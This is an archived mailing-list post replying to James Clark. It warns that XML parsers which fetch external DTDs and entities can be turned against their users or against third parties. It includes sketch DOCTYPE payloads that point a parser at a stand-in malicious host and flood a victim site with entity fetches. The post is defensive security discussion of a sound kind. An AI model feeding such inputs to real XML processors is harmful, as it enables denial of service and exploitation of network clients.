Lists Home |
Date Index |
James Clark wrote,
> Suppose an application is trying to use validation to protect itself
> from bad input. It carefully loads the schema cache with the
> namespaces it knows about, and calls validate(). Now the bad guy
> comes along and uses a root element from some other namespace and
> uses xsi:schemaLocation to point to his own schema that that has a
> declaration for that element and uses <xs:any namespace="##any"
> processContents="skip"/>. Won't they just have almost completely
> undermined any protection that was supposed to come from validation?
This is at least partly related to something that's been worrying me on
and off for quite a while now. It seems like a fairly obvious worry,
but I don't recall seeing any explicit discussion of it here (or
anywhere else for that matter).
Many (most?) off the shelf XML parsers, at least when validating, will
by default attempt to retrieve external subsets and other entities via
their system ids. This implies that an arbitrary XML document instance,
whether from a trusted or untrusted source, can cause an XML processor
to make network connections to any host on any port using any protocol
for which retrieval is supported by the network client associated with
the XML processor.
This opens up at least two, possibly more, kinds of attack,
* Exploiting vulnerabilities in network clients.
A malicious host might submit the following kind of document instance
to an XML processor,
<!DOCTYPE foo SYSTEM "http://www.malicious-host.com/evil-uri">
The server at www.malicious-host.com could return a response
carefully crafted to exploit weaknesses in the victim XML processors
* Using XML processors for denial of service attacks.
Consider the following document instance,
<!DOCTYPE foo [
<!ENTITY hit-1 SYSTEM "http://www.victim.org/victim-uri1>
<!ENTITY hit-2 SYSTEM "http://www.victim.org/victim-uri2>
<!-- repeat ad nauseam ... -->
<!ENTITY hit-n-1 SYSTEM "http://www.victim.org/victim-uri-n-1>
<!ENTITY hit-n SYSTEM "http://www.victim.org/victim-uri-n>
<!-- repeat ad nauseam ... -->
When presented with such a document an unwitting XML processor might
proceed to clobber www.victim.org.
If anyone can come up with variations on this theme I'd be extremely
interested to hear about them.
There are, I think, a couple of conclusions to draw from the examples
above. First, that validating untrusted documents, rather than
protecting receiving applications, might actually be quite a dangerous
activity. Second, that in some contexts XML document instances might be
better thought of as being closer to active content than to text/plain
thanks to the implicit retrieval semantics of references to external
Neither of these conclusions are particularly surprising, and in some
respects they've been discussed here before under the heading of XML
application robustness. For example, a related case would be the runtime
<!DOCTYPE foo SYSTEM "http://www.unwise.com/config.dtd">
for an application which insists on validating its configuration on
startup, but doesn't maintain a locally cached copy of the DTD: after
the 10000th sale the server at www.unwise.com collapses under the
strain of 10,000 requests for config.dtd at 9am in the morning leading
to all installations of the application failing. There's also a privacy
issue here: the DTD retrieval could be construed as the application